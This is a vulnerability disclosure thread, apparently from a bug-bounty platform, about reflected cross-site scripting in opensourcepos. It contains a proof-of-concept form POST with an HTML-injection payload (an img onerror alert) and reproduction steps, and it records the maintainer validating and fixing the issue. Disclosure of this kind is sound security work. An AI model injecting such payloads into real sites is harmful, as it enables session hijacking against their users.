Cross-site Scripting (XSS) - Reflected in opensourcepos/opensourcepos


Reported on

Sep 26th 2021


Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites

Proof of Concept

// PoC POST Request:


Content-Disposition: form-data; name="csrf_ospos_v3"

Content-Disposition: form-data; name="phone"

xss"><img src=x onerror=alert(5)>
Content-Disposition: form-data; name="message"

xss"><img src=x onerror=alert(5)>
Content-Disposition: form-data; name="submit_form"



This vulnerability is capable of claiming other users cookie performing other advanced scenarios . Account takeover is possible in this case .

We have contacted a member of the opensourcepos team and are waiting to hear back 2 years ago
2 years ago


This POST data is not read or stored from and loads from an empty form when you open the page. How can it then reach another user?

2 years ago


i know , cuz i didn't mention the full request . BTW you can follow these steps to reproduce the vulnerability .

1- Go to -> 2- inject "><img src=x onerror=alert(5)> on Phone number input . 3- you will get a message unsuccessfully sent to " injected byload" and you will get the alert

opensourcepos/opensourcepos maintainer validated this vulnerability 2 years ago
0x9x has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos marked this as fixed with commit 2b031e 2 years ago
jekkos has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation